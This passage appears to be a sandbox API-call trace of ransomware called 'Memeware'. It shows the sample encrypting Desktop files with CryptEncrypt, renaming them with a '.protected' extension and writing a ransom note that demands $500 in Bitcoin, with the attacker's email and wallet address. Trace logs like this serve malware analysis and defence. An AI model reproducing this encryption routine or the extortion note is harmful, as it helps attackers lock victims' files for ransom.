lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.290] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.290] CloseHandle (hObject=0xb4) returned 1 [0091.290] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PVIaNn zCaW2Y8.gif.protected") returned 70 [0091.290] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PVIaNn zCaW2Y8.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pviann zcaw2y8.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PVIaNn zCaW2Y8.gif.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pviann zcaw2y8.gif.protected")) returned 1 [0091.291] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.291] lstrcmpiW (lpString1="rsdBWtbO v.mp3", lpString2="Windows") returned -1 [0091.291] lstrcmpiW (lpString1="rsdBWtbO v.mp3", lpString2="Program Files") returned 1 [0091.291] lstrcmpiW (lpString1="rsdBWtbO v.mp3", lpString2="Program Files (x86)") returned 1 [0091.291] lstrcmpiW (lpString1="rsdBWtbO v.mp3", lpString2="$Recycle.bin") returned 1 [0091.291] lstrcmpiW (lpString1="rsdBWtbO v.mp3", lpString2="System Volume Information") returned -1 [0091.291] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rsdBWtbO v.mp3") returned 56 [0091.291] StrStrIW (lpFirst="rsdBWtbO v.mp3", lpSrch=".protected") returned 0x0 [0091.291] lstrcmpW (lpString1="rsdBWtbO v.mp3", lpString2="RESTORE_FILES.txt") returned 1 [0091.291] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.291] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.291] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rsdBWtbO v.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rsdbwtbo v.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.292] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rsdBWtbO v.mp3") returned 56 [0091.292] StrStrW (lpFirst="rsdBWtbO v.mp3", lpSrch=".txt") returned 0x0 [0091.292] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rsdBWtbO v.mp3") returned 56 [0091.292] StrStrW (lpFirst="rsdBWtbO v.mp3", lpSrch=".rar") returned 0x0 [0091.292] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rsdBWtbO v.mp3") returned 56 [0091.292] StrStrW (lpFirst="rsdBWtbO v.mp3", lpSrch=".zip") returned 0x0 [0091.292] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.292] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.293] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.293] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.293] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.293] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.293] CloseHandle (hObject=0xb4) returned 1 [0091.293] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rsdBWtbO v.mp3.protected") returned 66 [0091.293] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rsdBWtbO v.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rsdbwtbo v.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rsdBWtbO v.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rsdbwtbo v.mp3.protected")) returned 1 [0091.294] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.294] lstrcmpiW (lpString1="Sq8xDUaRjrYzUZE3R10.png", lpString2="Windows") returned -1 [0091.294] lstrcmpiW (lpString1="Sq8xDUaRjrYzUZE3R10.png", lpString2="Program Files") returned 1 [0091.295] lstrcmpiW (lpString1="Sq8xDUaRjrYzUZE3R10.png", lpString2="Program Files (x86)") returned 1 [0091.295] lstrcmpiW (lpString1="Sq8xDUaRjrYzUZE3R10.png", lpString2="$Recycle.bin") returned 1 [0091.295] lstrcmpiW (lpString1="Sq8xDUaRjrYzUZE3R10.png", lpString2="System Volume Information") returned -1 [0091.295] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Sq8xDUaRjrYzUZE3R10.png") returned 65 [0091.295] StrStrIW (lpFirst="Sq8xDUaRjrYzUZE3R10.png", lpSrch=".protected") returned 0x0 [0091.295] lstrcmpW (lpString1="Sq8xDUaRjrYzUZE3R10.png", lpString2="RESTORE_FILES.txt") returned 1 [0091.295] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.295] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.295] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Sq8xDUaRjrYzUZE3R10.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sq8xduarjryzuze3r10.png"), dwDesiredAccess=0xc0000000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.295] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Sq8xDUaRjrYzUZE3R10.png") returned 65 [0091.295] StrStrW (lpFirst="Sq8xDUaRjrYzUZE3R10.png", lpSrch=".txt") returned 0x0 [0091.295] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Sq8xDUaRjrYzUZE3R10.png") returned 65 [0091.295] StrStrW (lpFirst="Sq8xDUaRjrYzUZE3R10.png", lpSrch=".rar") returned 0x0 [0091.295] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Sq8xDUaRjrYzUZE3R10.png") returned 65 [0091.295] StrStrW (lpFirst="Sq8xDUaRjrYzUZE3R10.png", lpSrch=".zip") returned 0x0 [0091.295] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.296] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.296] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.296] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.296] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.296] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.296] CloseHandle 
(hObject=0xb4) returned 1 [0091.297] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Sq8xDUaRjrYzUZE3R10.png.protected") returned 75 [0091.297] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Sq8xDUaRjrYzUZE3R10.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sq8xduarjryzuze3r10.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Sq8xDUaRjrYzUZE3R10.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sq8xduarjryzuze3r10.png.protected")) returned 1 [0091.298] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.298] lstrcmpiW (lpString1="t6P4Y9hahIrm1AnV1.swf", lpString2="Windows") returned -1 [0091.298] lstrcmpiW (lpString1="t6P4Y9hahIrm1AnV1.swf", lpString2="Program Files") returned 1 [0091.298] lstrcmpiW (lpString1="t6P4Y9hahIrm1AnV1.swf", lpString2="Program Files (x86)") returned 1 [0091.298] lstrcmpiW (lpString1="t6P4Y9hahIrm1AnV1.swf", lpString2="$Recycle.bin") returned 1 [0091.298] lstrcmpiW (lpString1="t6P4Y9hahIrm1AnV1.swf", lpString2="System Volume Information") returned 1 [0091.298] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\t6P4Y9hahIrm1AnV1.swf") returned 63 [0091.298] StrStrIW (lpFirst="t6P4Y9hahIrm1AnV1.swf", lpSrch=".protected") returned 0x0 [0091.298] lstrcmpW (lpString1="t6P4Y9hahIrm1AnV1.swf", lpString2="RESTORE_FILES.txt") returned 1 [0091.298] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.298] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.298] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Desktop\\t6P4Y9hahIrm1AnV1.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t6p4y9hahirm1anv1.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.298] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\t6P4Y9hahIrm1AnV1.swf") returned 63 [0091.298] StrStrW (lpFirst="t6P4Y9hahIrm1AnV1.swf", lpSrch=".txt") returned 0x0 [0091.298] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\t6P4Y9hahIrm1AnV1.swf") returned 63 [0091.298] StrStrW (lpFirst="t6P4Y9hahIrm1AnV1.swf", lpSrch=".rar") returned 0x0 [0091.298] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\t6P4Y9hahIrm1AnV1.swf") returned 63 [0091.299] StrStrW (lpFirst="t6P4Y9hahIrm1AnV1.swf", lpSrch=".zip") returned 0x0 [0091.299] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.299] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.299] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.299] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.299] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.300] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, 
lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.300] CloseHandle (hObject=0xb4) returned 1 [0091.300] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\t6P4Y9hahIrm1AnV1.swf.protected") returned 73 [0091.300] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\t6P4Y9hahIrm1AnV1.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t6p4y9hahirm1anv1.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\t6P4Y9hahIrm1AnV1.swf.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t6p4y9hahirm1anv1.swf.protected")) returned 1 [0091.301] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.301] lstrcmpiW (lpString1="UAuTbU.gif", lpString2="Windows") returned -1 [0091.301] lstrcmpiW (lpString1="UAuTbU.gif", lpString2="Program Files") returned 1 [0091.301] lstrcmpiW (lpString1="UAuTbU.gif", lpString2="Program Files (x86)") returned 1 [0091.301] lstrcmpiW (lpString1="UAuTbU.gif", lpString2="$Recycle.bin") returned 1 [0091.301] lstrcmpiW (lpString1="UAuTbU.gif", lpString2="System Volume Information") returned 1 [0091.301] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UAuTbU.gif") returned 52 [0091.301] StrStrIW (lpFirst="UAuTbU.gif", lpSrch=".protected") returned 0x0 [0091.301] lstrcmpW (lpString1="UAuTbU.gif", lpString2="RESTORE_FILES.txt") returned 1 [0091.301] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.301] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.301] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UAuTbU.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\uautbu.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.302] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UAuTbU.gif") returned 52 [0091.302] StrStrW (lpFirst="UAuTbU.gif", lpSrch=".txt") returned 0x0 [0091.302] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UAuTbU.gif") returned 52 [0091.302] StrStrW (lpFirst="UAuTbU.gif", lpSrch=".rar") returned 0x0 [0091.302] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UAuTbU.gif") returned 52 [0091.302] StrStrW (lpFirst="UAuTbU.gif", lpSrch=".zip") returned 0x0 [0091.302] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.302] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.302] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.302] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.302] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.303] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: 
lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.303] CloseHandle (hObject=0xb4) returned 1 [0091.303] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UAuTbU.gif.protected") returned 62 [0091.303] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UAuTbU.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\uautbu.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UAuTbU.gif.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\uautbu.gif.protected")) returned 1 [0091.304] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.304] lstrcmpiW (lpString1="zo4hbkGIFA.pptx", lpString2="Windows") returned 1 [0091.304] lstrcmpiW (lpString1="zo4hbkGIFA.pptx", lpString2="Program Files") returned 1 [0091.304] lstrcmpiW (lpString1="zo4hbkGIFA.pptx", lpString2="Program Files (x86)") returned 1 [0091.304] lstrcmpiW (lpString1="zo4hbkGIFA.pptx", lpString2="$Recycle.bin") returned 1 [0091.304] lstrcmpiW (lpString1="zo4hbkGIFA.pptx", lpString2="System Volume Information") returned 1 [0091.304] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zo4hbkGIFA.pptx") returned 57 [0091.304] StrStrIW (lpFirst="zo4hbkGIFA.pptx", lpSrch=".protected") returned 0x0 [0091.304] lstrcmpW (lpString1="zo4hbkGIFA.pptx", lpString2="RESTORE_FILES.txt") returned 1 [0091.304] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.304] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.304] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Desktop\\zo4hbkGIFA.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zo4hbkgifa.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.304] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zo4hbkGIFA.pptx") returned 57 [0091.304] StrStrW (lpFirst="zo4hbkGIFA.pptx", lpSrch=".txt") returned 0x0 [0091.304] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zo4hbkGIFA.pptx") returned 57 [0091.304] StrStrW (lpFirst="zo4hbkGIFA.pptx", lpSrch=".rar") returned 0x0 [0091.304] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zo4hbkGIFA.pptx") returned 57 [0091.305] StrStrW (lpFirst="zo4hbkGIFA.pptx", lpSrch=".zip") returned 0x0 [0091.305] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.305] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.305] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.305] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.305] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.305] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, 
lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.306] CloseHandle (hObject=0xb4) returned 1 [0091.306] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zo4hbkGIFA.pptx.protected") returned 67 [0091.306] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zo4hbkGIFA.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zo4hbkgifa.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zo4hbkGIFA.pptx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zo4hbkgifa.pptx.protected")) returned 1 [0091.307] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0091.307] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0091.307] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES.txt") returned 59 [0091.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0091.308] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.308] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0091.308] lstrlenA (lpString="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") returned 684 [0091.308] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0091.309] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.309] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, 